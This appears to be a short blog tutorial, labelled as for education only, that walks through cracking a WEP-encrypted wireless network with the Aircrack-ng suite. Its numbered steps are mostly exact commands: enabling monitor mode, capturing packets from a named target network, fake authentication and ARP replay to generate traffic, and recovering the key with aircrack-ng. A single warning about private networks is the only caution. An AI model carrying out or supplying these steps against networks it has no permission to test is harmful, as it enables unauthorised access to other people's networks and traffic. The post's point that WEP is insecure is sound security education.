[Security] Wireless Network Hacking!

Image source: Hacking for dummies book
Today i will show you how to hack wireless network and get the password, the purpose behind this tutorial to show you that WEP encryption is not secure at all and can be hacked within minutes!

Warning: do not try to hack private network, this tutorial for education purpose only and for security experts to discover weakness point in wireless network, Please try it on your own network.

What you need :

Time : 5 min - ??! (varies according to network activity)
Difficulty : Easy!! (you should have some Linux experience)
Target wireless network : WEP encryption .
Software Used: BackTrack4 , Aircrack suite (already installed in BackTrack4)
Hardware Used : TP-Link TL-WN321G USB wireless adapter.

How To Hack WEP Wireless Network!

note: this technique is straight forward one, a lot of problems could be arise , and there are a lot of solutions too ( Read more at Aircrack Website )

1. Start the monitor mode in your wireless adapter
"airmon-ng start wlan0"
(my wireless adapter is wlan0 , change it according to what you have).

2. Start airodump to search for adjacent wireless networks.
"airodump-ng mon0"

3. After you decided which wireless network you want to hack , stop airodump by clicking "ctrl" + "c" , but you have to remember some information about the target netwrok, such as the MAC address, channel, BSSID.

As you can see from the image above ; my target netwrok is called (ESSID) "MusimieNetwork" and its BSSID is 00-23-CD-F4-F9-AE and its working under channel (CH) 6 .

4. now we will make authentication request .
"aireplay-ng -1 0 -a 00-23-CD-F4-F9-AE mon0
-1 : authntication order.
-a : the MAC address of the target network (00-23-CD-F4-F9-AE)
mon0 : the wireless interface .

Notice the authentication successful result!

5. We will start collecting packets and save them to file.
"airodump-ng -c 6 -w hack mon0"
-c : refers to the network channel.
-w : to write what we collect to the file name "hack"
mon0 : my adapter.

After starting packets collecting...

6. You have to wait till you collect more than 20,000 IVs , you can look at "#Data" column , if the network have a good traffic and the data amount is increasing rapidly you can skip to step 8 , if you don't have much traffic you have to make some traffic (go to step 7) .

7. Now we will increase the traffic in the network by generating some packets and replying them to the source.
"aireplay-ng -3 -b 00-23-CD-F4-F9-AE -h 00-25-86-E8-D0-AB mon0"
-b MAC of target network.
-h My MAC address (00-25-86-E8-D0-AB) . (optional if you have only one wireless card)

sometimes you have to wait for 5-10 minutes to see actual traffic .

8. Now start another terminal and write.
"aircrack-ng hack-01.cap"

hack-01.cap refers to the file we used to save the collected packets" (ya you have to add -01.cap to the file name)

if you are lucky enough and there is enough packets you will get the password within seconds!

if not, aircrack will try again automatically after it get another 5,000 packets!

  • All this process took me not more than 3 mins!!


See Also!

0 Response to "[Security] Wireless Network Hacking!"